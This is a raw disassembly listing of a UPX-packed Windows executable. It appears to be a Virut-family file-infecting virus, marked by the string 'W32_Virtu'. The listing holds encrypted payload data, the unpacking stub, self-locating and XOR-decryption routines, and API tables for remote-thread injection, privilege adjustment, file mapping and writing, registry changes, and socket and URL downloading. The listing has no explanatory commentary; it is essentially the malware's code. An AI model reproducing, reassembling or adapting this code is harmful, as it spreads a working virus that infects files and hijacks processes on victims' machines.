dd 760BF570h, 32657628h, 64B1649Dh, 53207B9Bh, 1B654410h
dd 1B2373B8h, 17234C42h, 0C3F1B19Bh, 3CAB25h, 1A202F42h
dd 8FA35AC9h, 44BF232Dh, 0D42B01E9h, 44378206h, 0EC667369h
dd 0DE46DBB9h, 6D672F66h, 6B632A9Ch, 2496C2FFh, 74690A63h
dd 614D2079h, 691A1E6Eh, 0B9158D76h, 206FF31h, 0A2CE8D24h
dd 4153527Ch, 0B3EFAC31h, 0FFFFFFF6h, 499F8EA4h, 0DB1F45DDh
dd 0E5B5C564h, 0CBE2AA0Dh, 63992223h, 18481C63h, 9AC3F273h
dd 0FFFFFC8Ch, 4D8556FFh, 0AD0FE1CCh, 691506D3h, 0A8FD8D37h
dd 700B1698h, 45504FCEh, 324A3914h, 0FFF4E3EFh, 479E1BFFh
dd 84DFBDD8h, 80371EBAh, 0F58B8173h, 0E07D4A0Dh, 0C52DFE92h
dd 6FFFFFFFh, 0E020C6AAh, 68BD9C85h, 0B6296A50h, 0C3348250h
dd 8117F42h, 0B7B21C98h, 899D9CE7h, 0FFFFFFFFh, 971A3D77h
dd 5029A4D3h, 3A96A58Dh, 0E8FC8D46h, 10EB1612h, 457044AFh
dd 966AD0F8h, 439FB178h, 0FFFFF56Fh, 0A827EB51h, 8A397086h
dd 0C214DE09h
dd 7A53C1A1h, 85C4BF16h, 29E70F90h, 0D1BC4BFFh, 898E9E98h
dd 714FE53h, 0A3ECCA94h, 1DA11E75h, 0FFFFFFF8h, 0C5B4E8F9h
dd 0DB1A4ECBh, 3969D7F0h, 948C1A87h, 1318C67Bh, 0BF3EB382h
dd 67E0424Bh, 0FFFFFEEBh, 0B737A217h, 0D8B3AA60h, 48022D7h
dd 4BA67A65h, 855886FFh, 0F96EF645h, 7C956EEh, 800DFFD3h
dd 0A63B4A32h, 0D3D87AB7h, 233263EBh, 0FBA5CD34h, 31505FF0h
dd 31BC03D8h, 0D96888A4h, 48D34D34h, 0E8041C2Ch, 9A69A65Eh
dd 0A4BCCC66h, 0A1748094h, 64709A69h, 2E9F7150h, 85D3B46Dh
dd 5754BB6h, 392E6CDCh, 92161600h, 0D64B72Dh, 67AD6BC5h
dd 0CB5B6C6Dh, 866E511Ch, 5E722C75h, 2F80F856h, 79627A6Fh
dd 726241D9h, 386DB612h, 0C79A414h, 35A35879h, 4A38D6B0h
dd 9DB6BA67h, 6178EB63h, 7578732Eh, 16466E27h, 4223472Eh
dd 0A0673D1Bh, 1A5D2FCAh, 6C2836C0h, 701A671Ch, 82E78D6Fh
dd 7A2E11BDh, 33091361h, 61C737FEh, 5F1361B3h, 7543676Fh
dd 0D33AE6Bh, 0D85E7720h, 7E541F74h, 6364DEC8h, 6F6C1FA5h
dd 0B5612D73h, 58F5ACADh, 0E320972Eh, 0D95B5D75h, 166C9BD6h
dd 0B92FBE62h, 9EF60466h, 6C667292h, 85330E61h, 67FF2536h
dd 2E7A6172h, 876D7461h, 0C0573536h, 0CA2D77C0h, 0ED751ED5h
dd 0CB3EDDBFh, 66216362h, 6B6ABF67h, 6F6E6D6Ch, 0FF527170h
dd 7485F52Fh, 79787792h, 4241E97Ah, 46454443h, 4A494847h
dd 6D2C504Bh, 51FC4E2Ch, 0C0A95440h, 582FBDABh, 0B81B5A59h
dd 81107790h, 20387AD6h, 5707B62Ah, 0A074AB7Bh, 0CACBEF8Ch
dd 13204B43h, 625B27Bh, 0B531650h, 0A474E4Fh, 374AFD2Eh
dd 3407490Bh, 4F4A9235h, 0D61F9240h, 55512F0Ch, 0B1DB5449h
dd 561AB5B7h, 1166477Bh, 79B57423h, 72FB8165h, 75F8417h
dd 70342E92h, 0E32820E0h, 3B6462F3h, 6B561820h, 454934DFh
dd 9153620h, 83762F1Eh, 3035A405h, 776B0029h, 0B80B735Ah
dd 2C610371h, 0DB5C4D02h, 7E75D34h, 7C03690Fh, 13312D65h
dd 84094514h, 0D37FCBD7h, 4009C45Dh, 74736C01h, 706D6372h
dd 4A2B4741h, 7465FFF7h, 61636F4Ch, 6E49656Ch, 530F6F66h
dd 0AD8A5B62h, 63194438h, 0AC15798Fh, 57A29741h, 34466569h
dd 23DCCB30h, 6954AE45h, 760B0E6Dh, 54DECD06h, 15206Fh
dd 7B1E4146h, 0D0CB2D0h, 646F4D3Fh, 215F96C9h, 614E2DBCh
dd 37A8E41h, 4169D80Bh, 0FF1F7E5Eh, 0DF0577BDh, 706F4309h
dd 69933879h, 6578456Eh, 720F7683h, 6F7E8151h, 50669A6Ch
dd 33707FFBh, 616E5332h, 6F687370h, 0D6D31974h, 12D6EEA0h
dd 0F737232h, 7D35C654h, 2CB982C0h, 654E2118h, 573B7478h
dd 7068837Ch, 0B06E4972h, 5CC3656Bh, 0A64B6D1h, 6A7F6163h
dd 0DC1E5B62h, 150C7645h, 53A14661h, 35BDCD88h, 624F910Ah
dd 4414AF6Ah, 509B3CB0h, 4CCD2BF5h, 0D8764561h, 2650AD66h
dd 656E165Dh, 97C24B06h, 6E7065ECh, 9B774711h, 25CFF628h
dd 64410B12h, 830F7264h, 2D1BE12Dh, 7262694Ch, 4D2B9261h
dd 686708DCh, 789E289Eh, 44964865h, 0A8274687h, 166CC2D4h
dd 701D7510h, 2D9744ABh, 7550DEB4h, 44EC4DD8h, 78E8B849h
dd 0DCD5141h, 0D923308Bh, 6201226Ah, 30879587h, 3178450Ch
dd 0C9785D52h, 82D0570h, 9C657A22h, 4886F66Ch, 0EA2F0Fh
dd 6EECDAD1h, 79227842h, 0A9277470h, 1582FB6Ch, 440A10C4h
dd 300E6112h, 0FCD0776Ch, 53796669h, 0A1BCA67h, 4C3357B1h
dd 6F4E7916h, 0BEC1879h, 4B112C7Bh, 52107965h, 66D17876h
dd 3E651E9Ch, 0D87114EFh, 63413F90h, 72697571h, 759B494Dh
dd 538FA16Fh, 67CE3A74h, 19430D92h, 41B69B62h, 93E0410h
dd 0FB0ED6Bh, 11350A51h, 0EC0466Ch, 2117301Ch, 598458EEh
dd 415FAC10h, 44686962h, 53F519E1h, 0DDBF8268h, 11D0B34Eh
dd 78F8DE13h, 72FD696Fh, 6105F977h, 469736Eh, 5F736F63h
dd 705F4845h, 0ADBBD2A6h, 0B6744DCh, 7878435Fh, 1F604C6Ch
dd 6BDE098Eh, 85076859h, 70E4DAE6h, 0E22A4279h, 0CEC73572h
dd 685FDD6Eh, 73293328h, 0DB0C7274h, 0D11CE66h, 366D4906h
dd 7316DB36h, 74AC0FB1h, 13CE994h, 6DADC669h, 8B7C7377h
dd 5496674h, 0A08668A4h, 7F3A3965h, 5A1586CDh, 210BE514h
dd 98CC20EDh, 49F6200Bh, 0E2B84F64h, 50F49A74h, 16C0B76Fh
dd 55353DB6h, 0E114173h, 465B0DC1h, 0BB5D115Bh, 0A992E8B1h
dd 53AB7D6Eh, 0D6CB6574h, 64527555h, 80212CAh, 0B2CB2C73h
dd 10D022Ch, 2CB26F39h, 340BB2CBh, 80090C17h, 4CB2CB2h
dd 9161013h, 5733D528h, 0B72F4550h, 7C83FDB3h, 40D3167Eh
dd 10F00E0h, 0C06010Bh, 0E02F7334h, 0B131259h, 3530E51Dh
dd 1B180125h, 6B020B31h, 9BA4B733h, 1E700C07h, 364B1C34h
dd 60710B0h, 2E3B4803h, 8CB15840h, 4EFB648Fh, 1B0D857h
dd 26042E1Eh, 0C1189033h, 0C43406C0h, 9DB906C0h, 2EE0043Eh
dd 0BDFB9064h, 0DC01211h, 3827E90Bh, 6000C038h, 1B6C3000h
dd 2C033D43h, 96h, 0
dd 0FF24h, 3 dup(0)
; ---------------------------------------------------------------------------
pusha
mov esi, offset dword_31506000
lea edi, [esi-5000h]
push edi
or ebp, 0FFFFFFFFh
jmp short loc_31508412
; ---------------------------------------------------------------------------
align 8
loc_31508408: ; CODE XREF: UPX1:loc_31508419�j
mov al, [esi]
inc esi
mov [edi], al
inc edi
loc_3150840E: ; CODE XREF: UPX1:315084A6�j
; UPX1:315084BD�j
add ebx, ebx
jnz short loc_31508419
loc_31508412: ; CODE XREF: UPX1:31508400�j
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_31508419: ; CODE XREF: UPX1:31508410�j
jb short loc_31508408
mov eax, 1
loc_31508420: ; CODE XREF: UPX1:3150842F�j
; UPX1:3150843A�j
add ebx, ebx
jnz short loc_3150842B
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_3150842B: ; CODE XREF: UPX1:31508422�j
adc eax, eax
add ebx, ebx
jnb short loc_31508420
jnz short loc_3150843C
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
jnb short loc_31508420
loc_3150843C: ; CODE XREF: UPX1:31508431�j
xor ecx, ecx
sub eax, 3
jb short loc_31508450
shl eax, 8
mov al, [esi]
inc esi
xor eax, 0FFFFFFFFh
jz short loc_315084C2
mov ebp, eax
loc_31508450: ; CODE XREF: UPX1:31508441�j
add ebx, ebx
jnz short loc_3150845B
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_3150845B: ; CODE XREF: UPX1:31508452�j
adc ecx, ecx
add ebx, ebx
jnz short loc_31508468
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_31508468: ; CODE XREF: UPX1:3150845F�j
adc ecx, ecx
jnz short loc_3150848C
inc ecx
loc_3150846D: ; CODE XREF: UPX1:3150847C�j
; UPX1:31508487�j
add ebx, ebx
jnz short loc_31508478
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_31508478: ; CODE XREF: UPX1:3150846F�j
adc ecx, ecx
add ebx, ebx
jnb short loc_3150846D
jnz short loc_31508489
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
jnb short loc_3150846D
loc_31508489: ; CODE XREF: UPX1:3150847E�j
add ecx, 2
loc_3150848C: ; CODE XREF: UPX1:3150846A�j
cmp ebp, 0FFFFF300h
adc ecx, 1
lea edx, [edi+ebp]
cmp ebp, 0FFFFFFFCh
jbe short loc_315084AC
loc_3150849D: ; CODE XREF: UPX1:315084A4�j
mov al, [edx]
inc edx
mov [edi], al
inc edi
dec ecx
jnz short loc_3150849D
jmp loc_3150840E
; ---------------------------------------------------------------------------
align 4
loc_315084AC: ; CODE XREF: UPX1:3150849B�j
; UPX1:315084B9�j
mov eax, [edx]
add edx, 4
mov [edi], eax
add edi, 4
sub ecx, 4
ja short loc_315084AC
add edi, ecx
jmp loc_3150840E
; ---------------------------------------------------------------------------
loc_315084C2: ; CODE XREF: UPX1:3150844C�j
pop esi
mov edi, esi
mov ecx, 0C8h
loc_315084CA: ; CODE XREF: UPX1:315084D1�j
; UPX1:315084D6�j
mov al, [edi]
inc edi
sub al, 0E8h
loc_315084CF: ; CODE XREF: UPX1:315084F4�j
cmp al, 1
ja short loc_315084CA
cmp byte ptr [edi], 1
jnz short loc_315084CA
mov eax, [edi]
mov bl, [edi+4]
shr ax, 8
rol eax, 10h
xchg al, ah
sub eax, edi
sub bl, 0E8h
add eax, esi
mov [edi], eax
add edi, 5
mov eax, ebx
loop loc_315084CF
lea edi, [esi+6000h]
loc_315084FC: ; CODE XREF: UPX1:3150851E�j
mov eax, [edi]
or eax, eax
jz short loc_31508547
mov ebx, [edi+4]
lea eax, [eax+esi+8000h]
add ebx, esi
push eax
add edi, 8
call dword ptr [esi+808Ch]
xchg eax, ebp
loc_31508519: ; CODE XREF: UPX1:3150853F�j
mov al, [edi]
inc edi
or al, al
jz short loc_315084FC
mov ecx, edi
jns short near ptr loc_3150852A+1
movzx eax, word ptr [edi]
inc edi
push eax
inc edi
loc_3150852A: ; CODE XREF: UPX1:31508522�j
mov ecx, 0AEF24857h
push ebp
call dword ptr [esi+8090h]
or eax, eax
jz short loc_31508541
mov [ebx], eax
add ebx, 4
jmp short loc_31508519
; ---------------------------------------------------------------------------
loc_31508541: ; CODE XREF: UPX1:31508538�j
call dword ptr [esi+8094h]
loc_31508547: ; CODE XREF: UPX1:31508500�j
popa
jmp loc_31501D0B
; ---------------------------------------------------------------------------
align 1000h
UPX1 ends
; Section 3. (virtual address 00009000)
; Virtual size : 00008000 ( 32768.)
; Section size in file : 00008000 ( 32768.)
; Offset to raw data for section: 00009000
; Flags E0000060: Text Data Executable Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
UPX2 segment para public 'CODE' use32
assume cs:UPX2
;org 31509000h
assume es:nothing, ss:nothing, ds:UPX0, fs:nothing, gs:nothing
dd 3 dup(0)
dd 90C4h, 908Ch, 3 dup(0)
dd 90D1h, 909Ch, 3 dup(0)
dd 90DEh, 90A4h, 3 dup(0)
dd 90E9h, 90ACh, 3 dup(0)
dd 90F4h, 90B4h, 3 dup(0)
dd 9100h, 90BCh, 5 dup(0)
dd 77E805D8h, 77E7A5FDh, 77E75CB5h, 0
dd 77DD189Ah, 0
dd 77C48D44h, 0
dd 77D4C96Ah, 0
dd 7620AFB6h, 0
dd 71AB1A6Dh, 0
dd 4E52454Bh, 32334C45h, 4C4C442Eh, 56444100h, 33495041h
dd 6C642E32h, 534D006Ch, 54524356h, 6C6C642Eh, 45535500h
dd 2E323352h, 6C6C64h, 494E4957h, 2E54454Eh, 6C6C64h, 5F325357h
dd 642E3233h, 6C6Ch, 64616F4Ch, 7262694Ch, 41797261h, 65470000h
dd 6F725074h, 64644163h, 73736572h, 78450000h, 72507469h
dd 7365636Fh, 73h, 43676552h, 65736F6Ch, 79654Bh, 69730000h
dd 6Eh, 72707377h, 66746E69h, 41h, 65746E49h, 74656E72h
dd 6E65704Fh, 41h, 26h dup(0)
dd 59E85Bh, 648B0000h, 0EBB80824h, 0EB000004h, 0A16764FAh
dd 408B0018h, 40B60F30h, 0F88302h, 0E83C75h, 5D000000h
dd 2320ED81h, 858B0040h, 402367h, 236F8503h, 0F08B0040h
dd 236B858Bh, 85030040h, 40236Fh, 33FE8B50h, 8532ACC9h
dd 402377h, 8D3B41AAh, 402373h, 2BC3EF7Ch, 30FF64C0h, 0B8208964h
dd 12345678h, 60000387h, 83F00000h, 0
dd 26003150h
db 2 dup(0), 28h
; =============== S U B R O U T I N E =======================================
public start
start proc near
var_C = dword ptr -0Ch
var_4 = dword ptr -4
call $+5
push ebp
mov ebx, [esp+8]
nop
mov ebp, [esp+8+var_4]
sub [esp+8+var_4], 84h
and ebx, 0FFFFF000h
sub ebp, 401005h
loc_315092A2: ; CODE XREF: start+3E�j
cmp dword ptr [ebx+4Eh], 73696854h
jnz short loc_315092B7
mov eax, [ebx+3Ch]
add eax, ebx
cmp word ptr [eax], 4550h
jz short loc_315092BF
loc_315092B7: ; CODE XREF: start+2A�j
sub ebx, 100h
jmp short loc_315092A2
; ---------------------------------------------------------------------------
loc_315092BF: ; CODE XREF: start+36�j
mov edx, [eax+78h]
add edx, ebx
mov esi, [edx+20h]
mov ecx, [edx+18h]
lea esi, [ebx+esi]
push ecx
loc_315092CE: ; CODE XREF: start:loc_315092F5�j
lodsd
add eax, ebx
cmp dword ptr [eax-1], 74654700h
jnz short loc_315092F5
cmp dword ptr [eax+3], 636F7250h
jnz short loc_315092F5
cmp dword ptr [eax+7], 72646441h
jnz short loc_315092F5
cmp dword ptr [eax+0Bh], 737365h
jz short loc_315092FA
loc_315092F5: ; CODE XREF: start+59�j start+62�j ...
loop loc_315092CE
pop ecx
pop ebp
retn
; ---------------------------------------------------------------------------
loc_315092FA: ; CODE XREF: start+74�j
sub [esp+0Ch+var_C], ecx
mov esi, [edx+24h]
pop ecx
add esi, ebx
movzx eax, word ptr [esi+ecx*2]
mov edi, [edx+1Ch]
add edi, ebx
mov esi, [edi+eax*4]
add esi, ebx
call near ptr loc_31509320+2
inc ebx
insb
outsd
jnb short near ptr loc_3150937E+2
dec eax
popa
outsb
db 64h
insb
loc_31509320: ; CODE XREF: start+92�p
add gs:[ebx-1], dl
start endp ; sp-analysis failed
setalc
mov [ebp+40240Bh], eax
call near ptr loc_3150933C+1
inc ebx
jb short loc_31509398
popa
jz short loc_3150939B
inc ebp
jbe short near ptr loc_3150939D+1
outsb
jz short near ptr loc_3150937B+2
loc_3150933C: ; CODE XREF: UPX2:3150932B�p
add [ebx-1], dl
setalc
mov [ebp+40240Fh], eax
call sub_31509358
inc edi
db 65h
jz short loc_3150939B
popa
jnb short sub_315093C6
inc ebp
jb short near ptr sub_315093C6+1
outsd
jb short $+2
; =============== S U B R O U T I N E =======================================
sub_31509358 proc near ; CODE XREF: UPX2:31509346�p
; FUNCTION CHUNK AT 315093D6 SIZE 0000008D BYTES
; FUNCTION CHUNK AT 315094F2 SIZE 000000DD BYTES
push ebx
call esi ; rand
mov [ebp+402413h], eax
call sub_315093AB
test eax, eax
jz short loc_3150938B
push eax
call dword ptr [ebp+402413h]
test eax, eax
jnz short loc_31509385
lea eax, [ebp+401157h]
loc_3150937B: ; CODE XREF: UPX2:3150933A�j
mov dl, [eax-1]
loc_3150937E: ; CODE XREF: start+9A�j
call sub_315093C6
jmp short loc_315093D6
; ---------------------------------------------------------------------------
loc_31509385: ; CODE XREF: sub_31509358+1B�j
; sub_31509358+E7�j ...
call dword ptr [ebp+40240Bh]
loc_3150938B: ; CODE XREF: sub_31509358+10�j
pop ebp
retn
sub_31509358 endp
; ---------------------------------------------------------------------------
loc_3150938D: ; CODE XREF: sub_315093AB+2�p
; sub_31509358:loc_31509562�p
pop edx
push 0
push 0
push 0
push 0
; ---------------------------------------------------------------------------
dw 168h
; ---------------------------------------------------------------------------
loc_31509398: ; CODE XREF: UPX2:31509331�j
add [eax+eax], al
loc_3150939B: ; CODE XREF: UPX2:31509334�j
; UPX2:3150934C�j
mov eax, esp
loc_3150939D: ; CODE XREF: UPX2:31509337�j
push 0
push eax
push 0Ch
mov eax, esp
push edx
retn
; ---------------------------------------------------------------------------
push esi
push esp
pop edi
xor eax, [eax]
; =============== S U B R O U T I N E =======================================
sub_315093AB proc near ; CODE XREF: sub_31509358+9�p
xor ecx, ecx
call loc_3150938D
lea edx, [ebp+401127h]
push edx
push ecx
push ecx
push eax
call dword ptr [ebp+40240Fh]
add esp, 20h
retn
sub_315093AB endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_315093C6 proc near ; CODE XREF: UPX2:31509350�j
; sub_31509358:loc_3150937E�p ...
mov dh, dl
mov ecx, 12B4h
loc_315093CD: ; CODE XREF: sub_315093C6+C�j
xor [eax], dl
inc eax
add dl, dh
loop loc_315093CD
retn
sub_315093C6 endp
; ---------------------------------------------------------------------------
dec eax
; START OF FUNCTION CHUNK FOR sub_31509358
loc_315093D6: ; CODE XREF: sub_31509358+2B�j
and dword ptr [ebp+401484h], 0
and dword ptr [ebp+401488h], 0
and dword ptr [ebp+40148Ch], 0
push edi
mov byte ptr [ebp+401264h], 1
mov [ebp+402417h], esi
lea esi, [ebp+4014ADh]
xor ecx, ecx
lea edi, [ebp+402427h]
mov cl, 1Ch
call sub_3150970F
pop edi
call dword ptr [ebp+40245Fh]
shr eax, 1Fh
jz loc_315094F2
mov eax, [edi+14h]
push 40h
add eax, ebx
push 8001000h
mov [ebp+40241Fh], eax
push 583Dh
push 0
call dword ptr [ebp+40248Fh]
test eax, eax
jz loc_31509385
xchg eax, edi
lea esi, [ebp+401000h]
mov ebp, edi
mov ecx, 610h
sub ebp, 401000h
lea edx, [ebp+4011E4h]
rep movsd
jmp edx
; END OF FUNCTION CHUNK FOR sub_31509358
; ---------------------------------------------------------------------------
sub esp, 20h
mov edi, esp
push 8
xor eax, eax
pop ecx
lea edx, [ebp+4018D5h]
rep stosd
mov edi, esp
mov [edi+10h], edx
inc byte ptr [edi+1Ch]
push edi
push 10003h
call dword ptr [ebp+40241Fh]
add esp, 20h
test eax, eax
jz loc_31509385
xchg eax, edi
push 0
push 1
push 80000400h
push 10000h
call dword ptr [ebp+40241Fh]
test eax, eax
jz loc_31509385
push 0
push eax
push 40000h
push 0
shr eax, 0Ch
push edi
push 1
push eax
push 10001h
call dword ptr [ebp+40241Fh]
push 1000Ah
call dword ptr [ebp+40241Fh]
call sub_315094E2
jmp loc_31509385
; =============== S U B R O U T I N E =======================================
sub_315094E2 proc near ; CODE XREF: UPX2:315094D8�p
; sub_315094E2+D�j
push 1
pop ecx
jecxz short locret_315094F1
push 0Ah
call dword ptr [ebp+402487h]
jmp short sub_315094E2
; ---------------------------------------------------------------------------
locret_315094F1: ; CODE XREF: sub_315094E2+3�j
retn
sub_315094E2 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_31509358
loc_315094F2: ; CODE XREF: sub_31509358+C0�j
cmp dword ptr [ebp+40243Fh], 0
jz loc_31509385
call near ptr loc_31509509+1
dec esi
push esp
inc esp
dec esp
dec esp
loc_31509509: ; CODE XREF: sub_31509358+1A7�p
add bh, bh
xchg eax, ebp
push ebx
and al, 40h
add [ebp+40163BB5h], cl
add [ebx], dh
leave
lea edi, [ebp+402497h]
mov cl, 9
xchg eax, ebx
call sub_3150970F
cmp dword ptr [ebp+4024B7h], 0
jz loc_31509385
mov eax, [ebp+40249Bh]
push dword ptr [eax+1]
pop dword ptr [ebp+4023C5h]
mov eax, [ebp+40249Fh]
push dword ptr [eax+1]
pop dword ptr [ebp+4023CBh]
mov ecx, [ebp+4024A3h]
jecxz short loc_31509562
push dword ptr [ecx+1]
pop dword ptr [ebp+4023D8h]
loc_31509562: ; CODE XREF: sub_31509358+1FF�j
call loc_3150938D
lea edx, [ebp+4014A3h]
push edx
push 583Dh
push 0
push 4
push eax
push 0FFFFFFFFh
call dword ptr [ebp+40242Fh]
add esp, 20h
push 583Dh
mov edx, esp
push 0
mov ecx, esp
push 4
push 0
push 2
push edx
push 0
push 583Dh
push 0
push ecx
push 0FFFFFFFFh
push eax
call dword ptr [ebp+4024A7h]
pop edi
pop ecx
test edi, edi
jz loc_31509385
lea esi, [ebp+401000h]
mov ecx, 610h
mov ebp, edi
rep movsd
sub ebp, 401000h
lea eax, [ebp+401350h]
jmp eax
; END OF FUNCTION CHUNK FOR sub_31509358
; ---------------------------------------------------------------------------
db 8Dh
db 95h ; •
db 8Dh, 17h, 40h
db 0
db 52h, 0FFh, 95h
db 67h ; g
db 24h, 40h, 0
db 0E8h ; è
db 16h, 2 dup(0)
db 0
aLookupprivil_0 db 'LookupPrivilegeValueA',0
db 50h
dd 241795FFh, 85890040h, 40241Bh, 206A5450h, 95FFFF6Ah
dd 4024ABh, 755FC085h, 26A963Fh, 0D48B5656h, 0E852016Ah
dd 11h, 65446553h, 50677562h, 69766972h, 6567656Ch, 95FF5600h
dd 40241Bh, 5656C48Bh, 57565056h, 249795FFh, 0C4830040h
dd 95FF5710h, 40240Bh, 26A006Ah, 243F95FFh, 28B90040h
dd 97000001h, 0C89E12Bh, 0FF575424h, 40247795h, 83F63300h
dd 4024FBA5h, 57540000h, 247B95FFh, 0C0850040h, 83465C74h
dd 0EE7204FEh, 82474FFh, 2A6A006Ah, 247395FFh, 0C0850040h
dd 0E893DC74h, 3E6h, 0E391C933h, 0FB853930h, 75004024h
dd 42C18128h, 5000000Ch, 51565054h, 0FF535050h, 40243795h
dd 59C08500h, 74FF0F74h, 858F0824h, 4024FBh, 0FFFE09E8h
dd 95FF53FFh, 40240Bh, 0C48198EBh, 128h, 0B95FF57h, 0E9004024h
dd 0FFFFFC91h, 5800498Dh, 3D005858h, 0F8000018h, 0Bh, 2 dup(0)
db 3 dup(0)
; =============== S U B R O U T I N E =======================================
sub_3150970F proc near ; CODE XREF: sub_31509358+B1�p
; sub_31509358+1C9�p ...
push ecx
push esi
push ebx
call dword ptr [ebp+402417h]
stosd
pop ecx
loc_3150971A: ; CODE XREF: sub_3150970F+E�j
lodsb
test al, al
jnz short loc_3150971A
loop sub_3150970F
retn
sub_3150970F endp
; ---------------------------------------------------------------------------
aW32_virtu db 'W32_Virtu',0
aLstrlen db 'lstrlen',0
aCreatefilea db 'CreateFileA',0
aCreatefilemapp db 'CreateFileMappingA',0
aCreateprocessa db 'CreateProcessA',0
aCreateremote_0 db 'CreateRemoteThread',0
aCreatethread db 'CreateThread',0
aCreatetoolhelp db 'CreateToolhelp32Snapshot',0
aExitthread db 'ExitThread',0
aGetfileattribu db 'GetFileAttributesA',0
aGetfilesize db 'GetFileSize',0
aGetfiletime db 'GetFileTime',0
aGetmodulehandl db 'GetModuleHandleA',0
aGettempfilenam db 'GetTempFileNameA',0
aGettemppatha db 'GetTempPathA',0
aGetversion db 'GetVersion',0
aGetversionexa db 'GetVersionExA',0
aLoadlibrarya db 'LoadLibraryA',0
aMapviewoffile db 'MapViewOfFile',0
aOpenfilemappin db 'OpenFileMappingA',0
aOpenprocess db 'OpenProcess',0
aProcess32first db 'Process32First',0
aProcess32next db 'Process32Next',0
aSetfileattribu db 'SetFileAttributesA',0
aSetfiletime db 'SetFileTime',0
aSleep db 'Sleep',0
aUnmapviewoffil db 'UnmapViewOfFile',0
aVirtualalloc db 'VirtualAlloc',0
aWritefile db 'WriteFile',0
aNtadjustprivil db 'NtAdjustPrivilegesToken',0
aNtcreatefile db 'NtCreateFile',0
aNtcreateproces db 'NtCreateProcess',0
aNtcreateproc_0 db 'NtCreateProcessEx',0
aNtmapviewofsec db 'NtMapViewOfSection',0
aNtopenprocesst db 'NtOpenProcessToken',0
aNtprotectvirtu db 'NtProtectVirtualMemory',0
aNtwritevirtual db 'NtWriteVirtualMemory',0
aRtlunicodestri db 'RtlUnicodeStringToAnsiString',0
aWsastartup db 'WSAStartup',0
aClosesocket db 'closesocket',0
aConnect db 'connect',0
aGethostbyname db 'gethostbyname',0
aRecv db 'recv',0
aSend db 'send',0
aSocket db 'socket',0
aInternetcloseh db 'InternetCloseHandle',0
aInternetgetcon db 'InternetGetConnectedState',0
aInternetopena db 'InternetOpenA',0
aInternetopenur db 'InternetOpenUrlA',0
aInternetreadfi db 'InternetReadFile',0
aAdvapi32_dll db 'ADVAPI32.DLL',0
aRegclosekey db 'RegCloseKey',0
aRegopenkeyexa db 'RegOpenKeyExA',0
aRegqueryvaluee db 'RegQueryValueExA',0
aRegsetvalueexa db 'RegSetValueExA',0
; =============== S U B R O U T I N E =======================================
sub_31509A53 proc near ; CODE XREF: sub_31509A8A+6C�p
; sub_31509A8A+7D�p ...
var_5 = byte ptr -5
sub ecx, 5
sub ecx, eax
push ecx
push 0E8000000h
lea ecx, [esp+8+var_5]
push 0
push 5
push ecx
push eax
push ebx
push 5
mov ecx, esp
push eax
mov edx, esp
push eax
push esp
push 40h
push ecx
push edx
push ebx
call dword ptr [ebp+4024AFh]
add esp, 0Ch
call dword ptr [ebp+4024B3h]
add esp, 8
retn
sub_31509A53 endp
; =============== S U B R O U T I N E =======================================
sub_31509A8A proc near ; CODE XREF: UPX2:3150A681�p
push edi
lea eax, [ebp+4014A3h]
xor edi, edi
push eax
push 0
push 6
call dword ptr [ebp+40246Fh]
test eax, eax
jz short loc_31509B21
push eax
push 583Dh
mov edx, esp
push 0
mov ecx, esp
push 4
push 100000h
push 2
push edx
push 0
push 583Dh
push 0
push ecx
push ebx
push eax
call dword ptr [ebp+4024A7h]
pop edi
pop ecx
call dword ptr [ebp+40240Bh]
test edi, edi
jz short loc_31509B21
mov ecx, [ebp+40148Ch]
jecxz short loc_31509AEA
lea edx, [ebp+401000h]
add edx, ecx
push edi
push ebx
call edx
loc_31509AEA: ; CODE XREF: sub_31509A8A+52�j
mov eax, [ebp+40249Bh]
lea ecx, [edi+137Dh]
call sub_31509A53
mov eax, [ebp+40249Fh]
lea ecx, [edi+13CAh]
call sub_31509A53
mov eax, [ebp+4024A3h]
test eax, eax
jz short loc_31509B21
lea ecx, [edi+13D7h]
call sub_31509A53
loc_31509B21: ; CODE XREF: sub_31509A8A+16�j
; sub_31509A8A+4A�j ...
mov eax, edi
pop edi
retn
sub_31509A8A endp
; ---------------------------------------------------------------------------
push ebp
call $+5
pop ebp
sub ebp, 4018ACh
xor ecx, ecx
lea eax, [ebp+401C42h]
push ecx
push esp
push ecx
push ecx
push eax
push ecx
push ecx
call dword ptr [ebp+40243Bh]
xchg eax, [esp]
call dword ptr [ebp+40240Bh]
pop ebp
retn 4
; ---------------------------------------------------------------------------
dd 0E855h, 815D0000h, 4018DBEDh, 8DFF6A00h, 4018A695h
dd 0CD525000h, 2A002420h, 0CC48300h, 0EC85C766h, 0CD004018h
dd 0EE85C720h, 24004018h, 5D002A00h, 6A016AC3h, 0FF33FF01h
dd 15FF0473h, 0F074C085h, 0B68h, 5BD08B00h, 8D3C5003h
dd 40190AB5h, 0CBA8B00h, 8B000001h, 1088Ah, 2BF80300h
dd 0CB8B60CBh, 7461A6F3h, 0F5E24705h, 0C783C2EBh, 0D48B570Fh
dd 50CC8B53h, 51406A54h, 0FFFF6A52h, 4024AF95h, 0CC48300h
dd 2443958Bh, 0D72B0040h, 0C707EA83h, 0E8006A07h, 3578900h
dd 59569C3h, 5004025h, 33080884h, 1AB042C0h, 25059589h
dd 0E2F70040h, 0AA61428Dh, 0E175C9FEh, 0E855C3h, 5D000000h
dd 199CED81h, 9D8B0040h, 402509h, 8247C83h, 0B9840F00h
dd 81000000h, 208ECh, 4685400h, 0FF000001h, 40245B95h
dd 8DFC8B00h, 1042484h, 6A500000h, 4E800h, 52560000h, 0FF570054h
dd 40245795h, 8DC93300h, 10497h, 6A515100h, 16A5102h, 68h
dd 95FF5240h, 40242Bh, 74F68596h, 6854505Bh, 104h, 24B4FF57h
dd 220h, 24E795FFh, 85590040h, 0E31674C0h, 0D48B5014h
dd 5152006Ah, 95FF5657h, 402493h, 75C08559h, 95FF56D0h
dd 40240Bh, 5244578Dh, 58446A57h, 104978Dh, 33AB0000h
